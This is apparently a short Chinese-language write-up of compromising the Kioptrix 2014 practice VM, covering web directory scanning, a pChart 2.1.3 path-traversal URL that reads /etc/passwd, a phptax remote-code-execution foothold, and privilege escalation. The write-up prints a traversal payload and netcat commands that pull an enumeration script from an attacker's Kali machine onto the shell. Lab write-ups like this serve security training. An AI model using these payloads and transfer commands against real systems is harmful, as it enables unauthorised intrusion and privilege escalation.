Kioptrix 2014
Kioptrix 2014
2:07 开始
http://192.168.67.129/
1 |
|
web
2:28 web目录扫描,爬行
查看源码,发现一个地址pChart2.1.3/index.php
1 |
|
exp提示有目录遍历漏洞和反射型xss
http://192.168.67.129/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
查看apache配置文件
1 |
|
经过检查得知,修改user-agent头,可以访问8080端口。
http://192.168.67.129:8080/phptax/
找到phptax 远程代码执行,拥有exp
1 |
|
获得一个www权限的shell
privelege
ctrl + z 退出session,记住session编号。
1 |
|
没有python、php、wget、curl,但是有nc,gcc
上传检查脚本
kali: nc -lnvp 80 < linux-exploit-suggester.sh
shell: nc kali’sIP 80 > linux.sh
运行后还是失败,猜测只有bash才能运行linux-exploit-suggester.sh,而得到的shell类型为sh
searchsploit freebsd 9
上传对应的内核漏洞exp
4:50结束,其中神游发呆做菜聊天占了绝大部分时间ORZ
conclusion
1 |
|
如果不加-w参数,nc会一直连接,哪怕是传输文件成功了,也不会断开。
所以必须加该参数,否则不稳定的shell运行ctrl+c,shell就会没有了。